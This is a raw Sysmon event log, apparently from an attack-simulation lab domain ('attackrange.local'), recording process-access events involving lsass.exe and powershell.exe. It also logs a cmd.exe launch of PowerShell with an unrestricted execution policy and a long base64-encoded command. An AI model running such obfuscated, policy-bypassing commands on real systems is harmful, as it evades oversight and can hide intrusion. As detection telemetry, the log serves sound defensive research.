15:52:12.804{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.773{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zxrbzimd.x5g.ps12020-11-03 15:52:12.773 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.757{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7CAC-5FA1-AB00-000000008801}42364252C:\Windows\system32\conhost.exe{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.726{D28789B6-7CAC-5FA1-AC00-000000008801}50124804C:\Windows\system32\cmd.exe{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:12.735{D28789B6-7CAC-5FA1-AD00-000000008801}1348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CAC-5FA1-2CE6-060000000000}0x6e62c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CAC-5FA1-AC00-000000008801}5012C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 